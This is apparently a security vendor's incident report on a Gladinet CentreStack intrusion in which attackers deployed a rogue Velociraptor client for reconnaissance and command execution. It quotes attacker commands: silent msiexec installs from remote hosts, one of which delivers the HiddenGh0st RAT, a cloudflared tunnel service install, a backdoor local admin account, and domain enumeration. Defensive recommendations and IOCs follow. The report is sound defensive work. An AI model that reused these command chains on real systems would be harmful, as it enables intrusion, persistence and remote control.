Jurassic SOC: When Velociraptor Gets Hijacked
The Blackpoint Response Operation Center (BROC) responded to an incident involving the exploitation of Gladinet Centrestack. The intrusion began on the CentreStack server within IIS. The portal application pool worker, w3wp.exe, spawned msiexec.exe as NT AUTHORITY\SYSTEM and immediately performed a quiet install from a remote Wasabi S3 URL, retrieving v4.msi.
This sequence reflected a direct pivot from the web application context into SYSTEM level execution and utilized MSI based delivery as the first stage payload mechanism. The remote installer was followed by the appearance and service execution of Velociraptor, indicating that v4.msi functioned as the Velociraptor deployment package.
After installation, Velociraptor was started as a SYSTEM service using a local client configuration file, shown by Velociraptor.exe –config “C:\Program Files\Velociraptor\client.config.yaml” service run. Right after the service was executed, the host began repeatedly issuing encoded PowerShell commands. These commands decoded into short, structured discovery tasks executed via native utilities.
The workflow included commands such as net time /do to query domain time, quser to list active interactive sessions, ipconfig /all to inventory network interfaces, DNS configuration, and domain context, and tasklist /v to capture a verbose process and service view with ownership and session data. The actor also ran setspn -Q VeeamBackupSVC/*, a targeted service principal name search to identify backup related accounts and infrastructure during early reconnaissance.
Discovery then expanded outward into Active Directory mapping. The actor executed nltest /domain_trusts to enumerate trust relationships, followed by nltest /dclist:<sub>.<domain> to identify domain controllers. They validated reachability to the identified domain controllers via ping.exe <DC>.<sub>.<domain>, then attempted to enumerate domain computer membership using net1.exe group “domain computers” /do. The sequence resulted in establishing an overview of the domain: by understanding trust paths first, locating authentication hubs next, confirming network access to them, and then enumerating potential endpoint targets.
With reconnaissance underway, the actor installed an additional remote access channel. Encoded PowerShell triggered a quiet MSI installation of cloudflared from GitHub, and immediately afterward ran cloudflared.exe service install <auth token>, creating a persistent Windows service tied to the provided token. This added an outbound tunnel operating over standard HTTPS egress, providing a separate path for remote control alongside Velociraptor’s tasking capability.
The actor also established local administrative access. Encoded commands translated to net1.exe user itadmin <password> /add, followed by net1.exe localgroup administrators itadmin /add. They then enumerated users with net1.exe user, and queried for a centrestack account, showing both situational awareness of existing access and the creation of a new privileged local foothold for interactive use.
The final observed phase showed attempted tooling expansion. PowerShell launched another quiet MSI install from files[.]catbox[.]moe/0nem4w.msi, then ran WMIC.exe product get to check the installed software state immediately after deployment.
Across the chain, the activity showed a rapid progression from CentreStack portal exploitation into SYSTEM level MSI delivery, deployment of Velociraptor for structured host and domain reconnaissance, installation of a persistent cloudflared tunnel service for resilient remote access, creation of a local administrator account for backup foothold, and a follow on MSI based payload attempt.
Key Findings
- Initial Access: The actor gained entry through an internet facing CentreStack instance, with the IIS worker process w3wp.exe spawning msiexec.exe to perform a silent install of a remote MSI.
- Post Exploitation Platform: Velociraptor was installed as a SYSTEM service and abused as a post exploitation tool for command execution.
- Reconnaissance: The intrusion included broad host and Active Directory discovery, driven by scripted PowerShell and native Windows and AD enumeration utilities.
- Payload Staging: Additional tooling, including a VS Code binary (code.exe), was downloaded from Cloudflare Workers and Wasabi S3.
- C2 and Egress: cloudflared was installed and configured with a persistent token, creating an outbound tunnel for C2.
- Persistence: A local user account, itadmin was created and added to the local administrators group.
- Tradecraft: The intrusion relied on signed binaries, cloud hosted payloads, and dual use tools to avoid detection, and maintain operational stealth.
Observed Killchain
Your CentreStack is Showing: Exposed Services & VelociRaptor Post-Compromise Tradecraft
The compromise began in the IIS worker process (w3wp.exe), which executed msiexec.exe to pull v4.msi directly from a Wasabi S3 bucket. This matched known CentreStack exploitation behavior, where attackers abuse the application’s public interface to pivot into the underlying Windows server.
Image 1 – Exploitation of Gladinet Centrestack
Analyzing the available IIS logs confirmed exploitation of Gladinet Centrestack. The IP tied to this exploitation was 45.45.218[.]115.
Image 2 – IIS Logs show 45.45.218[.]115 is tied to the Centrestack exploitation
Open-Source Intelligence (OSINT) found that this IP was tied to a HostHatch VPS. Threat actors leverage cheap and stolen VPS for these compromises as they provide an inexpensive and quick method for command and control. The HostHatch VPS in question was tied to the domain hellboyz[.]xyz.
Image 3 – Censys.io lookup on 45.45.218[.]115
The execution of the v4.msi file installed Velociraptor onto the impacted server. Velociraptor is an open-source Digital Forensics and Incident Response (DFIR) platform that deploys lightweight endpoint clients and allows an operator to run remote “hunts”, collect artifacts, and execute VQL queries across fleets. It is built for legitimate investigation and monitoring, but can be abused to remotely execute commands, pull files, and perform reconnaissance as a fully-fledged post exploitation framework.
After Velociraptor was installed and started as a SYSTEM-level service, it immediately triggered a structured discovery routine by tasking a series of encoded PowerShell commands. Those PowerShell stagers acted as thin wrappers to launch built in Windows utilities, which is a common way to blend reconnaissance into normal administrative noise while still collecting high value context.
The sequence showed deliberate host and domain situational awareness: net time /do and its net1.exe handoff confirmed domain time and connectivity, quser.exe enumerated active interactive sessions and logged on users, ipconfig.exe /all harvested interface details, DNS servers, and domain suffixes, and tasklist.exe /v inventoried running processes with ownership and session metadata.
The actor then pivoted into identity and infrastructure targeting and queried SPNs with setspn.exe -Q VeeamBackupSVC/*, which suggested they were hunting for backup service accounts or servers, and performed group-based enumeration with net1.exe group “domain computers” /do which listed machine objects. In parallel, nltest.exe /domain_trusts and nltest.exe /dclist:<sub>.<domain> mapped trust relationships and domain controllers, while direct ping.exe to a DC validated reachability.
Image 4 – Enumeration of logged on users, IP configuration, and time
Image 5 – Enumeration of Tasklist via Velociraptor
Image 6 – Misspelling of “Domain Computers” during manual enumeration via Velociraptor
The actor pulled a secondary payload, code.exe, from the same Wasabi hosted infrastructure used earlier in the chain and wrote it into C:\ProgramData\Microsoft\code.exe. Placing the file under ProgramData in a Microsoft labeled subdirectory in an attempt to masquerade as the legitimate VS Code. After the drop, the host repeatedly invoked Get-FileHash against that exact path, which showed that the operator treated the file as a managed stage rather than a disposable artifact.
The pattern fits a workflow where the attacker verified payload integrity immediately after transfer, then rechecked it over time to confirm the on-disk binary still matched the expected version before tasking or execution. Frequent hashing also lined up with staged updates from remote storage, where tooling can be swapped in place, and the actor validated that the local copy was not modified or quarantined.
Image 7 – Downloading of code.exe from previously seen bucket
The Cloudflare activity appeared as a deliberate secondary access setup following Velociraptor based reconnaissance. Encoded PowerShell launched msiexec.exe in quiet mode which pulled and installed cloudflared-windows-amd64.msi directly from Cloudflare’s GitHub release path. Using MSI delivery here mirrored the earlier tool staging method and kept installation non interactive, which produced a standard Windows Installer footprint instead of a custom dropper.
Following the installation, another encoded PowerShell command executed cloudflared.exe service install <auth token>, which registered cloudflared as a persistent Windows service bound to the supplied token. The presence of both cloudflared.exe and the DOS 8.3 short-path invocation CLOUDF~1.EXE “C:\Program Files (x86)\cloudflared\cloudflared.exe” service install <auth token> showed the actor ensured the service install succeeded even if path parsing or quoting failed.
Once installed as a service under Program Files (x86), cloudflared could provide an outbound tunnel over standard HTTPS egress, giving the operator a resilient remote-control path that can run continuously and survive reboots alongside the Velociraptor service. This installation was blocked by Blackpoint’s Managed Application Control (MAC).
Image 8 – Installation of Cloudflared and attempts to tunnel out
Account activity in the telemetry showed that the actor moved from reconnaissance into access hardening by manipulating local users while existing identities tied to the application were surveyed. Encoded PowerShell first invoked net1.exe user itadmin <password> /add, which created a new local account with a preset credential, and then followed with net1.exe localgroup administrators itadmin /add, immediately elevating that account into the local Administrators group.
This activity portrays a foothold step designed to provide interactive admin access without relying on the original execution vector or tooling.
Image 9 – Creation of itadmin account and adding this user to local administrator group
Immediately after establishing that backdoor, the actor ran net1.exe user to list accounts and then issued a targeted query for net1.exe user centrestack /do. In practice, this kind of lookup is used to confirm whether a predictable service or admin account exists, to understand naming conventions in the environment, and to identify potentially privileged identities that may be tied to the CentreStack deployment.
Image 10 – Enumeration of centrestack user
The actor then launched nltest /domain_trusts and enumerated trust relationships, which surfaced any outbound or inbound trust paths that could expand reach beyond the current domain. They follow by running nltest /dclist:<sub>.<domain> which identified domain controllers for that namespace, then validated network reachability with ping.exe <DC>.<sub>.<domain>.
After that groundwork, activity shifted into hands on access to a domain controller using the newly created local admin foothold. The RDP session attributed to itadmin into a DC indicates the actor transitioned from discovery to direct administrative interaction with core directory infrastructure. Using that account for RDP also showed they were comfortable enough with its privileges and stability to rely on it for interactive work, not just as a backup credential.
The repeated quser.exe executions and the DC-targeted ping.exe <DC>.<sub>.<domain> events were reflective of Velociraptor tasked discovery from the CentreStack box itself. From that vantage point, quser.exe gave the operator a rolling view of interactive sessions present on the CentreStack server, letting them track whether administrators or service operators are logged in locally or over RDP and whether any live sessions are worth targeting.
Image 11 – Enumeration of Domain Trusts + locating of Domain Controllers
The later stage MSI activity showed the actor pivoting to an additional payload stream after Velociraptor and cloudflared. Encoded PowerShell launched msiexec.exe /q /i hxxps[://]files[.]catbox[.]moe/0nem4w.msi, which is a quiet, non-interactive install over HTTPS from a public file-sharing host. Using msiexec.exe again kept delivery consistent with the earlier toolkit staging, produced standard Windows Installer artifacts, and let the operator deploy a packaged implant without needing a custom loader.
Execution of the 0nem4w.msi file in the BROC’s sandbox confirmed it deploys HiddenGh0st, a variant of the Gh0st RAT that allows attackers to remotely operate a Windows machine, enabling them to run commands, move files, and monitor the system as if they were sitting in front of it.
Immediately after the MSI attempt, the actor ran WMIC.exe product get, which in this context reflects a post install sanity check. WMIC can surface newly registered MSI products, so firing it right after the install reads like the operator checking whether the package registered on the box or whether anything blocked it. Even if the MSI did not fully land, the sequence showed a clear attempt to add a second method of remote access.
Image 12 – Attempt to install HiddenGh0st
Investigation into the Velociraptor client configuration showed it was not operating in a standalone or local collection mode, but was instead pointed at a remote controller at auth[.]qgtxtebl[.]workers[.]dev. This configuration means the client was provisioned to beacon out to a specific endpoint for enrollment and ongoing tasking, using the server URL embedded in the YAML to retrieve jobs, upload results, and maintain a persistent management channel.
The hostname format indicated the infrastructure is hosted on a Cloudflare Workers subdomain, which provided a globally distributed HTTPS front that the client can reach over standard outbound ports without needing any custom listener exposed on the victim side.
With that configuration in place, Velociraptor functioned as a full remote administration plane: the operator pushed VQL hunts, executed PowerShell and native binaries, pulled files, and staged additional tooling through the same channel. The presence of an explicit auth subdomain suggested the endpoint was used for agent authentication or gateway services rather than a random file host, reinforcing that this URL is part of the active control path for the deployed client.
Image 13 – Velociraptor logs show Cloudflare Worker Domain is tied to Rogue instance
The activity showed a clean end to end intrusion flow that started with execution through the CentreStack IIS portal and quickly turned that foothold into SYSTEM level tool deployment. The actor used remote MSI installs to stage Velociraptor, then relied on Velociraptor tasking to run encoded PowerShell that fanned out into built in Windows reconnaissance, moving from host context to domain context through session checks, network and process inventory, SPN hunting, and trust and domain controller enumeration.
With the environment mapped, the threat actor established redundant access paths by installing cloudflared and registered it as a service, creating a privileged local user for interactive fallback, and continued managing secondary payloads from the same external infrastructure, including routinely validating an on disk code.exe and attempting an additional MSI delivered implant from catbox.
The killchain showcased an operator working methodically from initial access to reconnaissance, persistence, and expansion of readiness, leveraging a combination of dual use frameworks and native utilities to stay fast, scriptable, and resilient.
Recommendations
- Eliminate direct internet exposure for CentreStack and any associated admin or management portals.
- Track and alert on suspicious MSI activity, especially msiexec.exe reaching out to external URLs. Quiet or unattended MSI installations originating from the internet should be treated as high-risk and investigated quickly.
- Reduce risk from remote management tool abuse by monitoring unapproved agents and binaries such as Velociraptor, ScreenConnect, Cloudflared, and comparable utilities.
- Implement Blackpoint’s Managed Application Control (MAC) to block the execution of unauthorized applications.
- Tighten outbound network controls and explicitly block tunneling utilities. Apply egress filtering and deny access to cloudflared, ngrok, and similar tunneling services unless there is a documented business need.
- Review local administrator access for anomalies. Generate alerts on new local user creation, additions to privileged groups, and unexpected privilege changes across endpoints and servers.
- Maintain continuous software inventory and integrity checks to confirm installed applications are legitimate and to catch unauthorized deployments or modifications early.
- Leverage the Blackpoint SOC for sustained monitoring, detection engineering, and rapid response aligned to these intrusion patterns.
Indicators of Compromise (IOCs)
Network
| Type | Indicator | Context / Notes |
| Domain | hellboyz[.]xyz | Domain tied to Centrestack Exploitaiton |
| Domain | s3[.]wasabisys[.]com | Bucket hosting Velociraptor install / VS Code |
| Domain | files[.]catbox[.]moe | File hosting site leveraged for staging of HiddenGh0st |
| Domain | upload[.]jbowpxyy[.]workers[.]dev | Staging Domain |
| URL | hxxps[://]github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi | Repo for Cloudflared |
| URL | hxxps[://]s3[.]wasabisys[.]com/kiessler/v4.msi | Velociraptor Installer |
| URL | hxxps[://]upload[.]jbowpxyy[.]workers[.]dev/code[.]txt | VS Code Binary |
Files and Hashes
| Item | File name / Path | SHA256 | Context / Notes |
| Binary | code.exe | 34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4 | VS Code |
| RMM | velociraptor.exe | 937e85f656a5761afc0d95821931f05bf8b13878c5c51245fe405f9d3724a788 | Velociraptor Binary |
| MSI Installer | v4.msi | 46831be6e577e3120084ee992168cca5af2047d4a08e3fd67ecd90396393b751 | Velociraptor Installer |
| MSI installer | cloudflared-windows-amd64.msi | 6d2eea059b29d04bb4b68c4a1172e631df4a49c3e2a11195619533ae437c46d4 | Cloudflared installer |
| MSI installer | 0nem4w.msi | 32813a6fc180631353b84f69c3beb431c869e45aa7af4e6b2a5722586853a9ed | HiddenGh0st |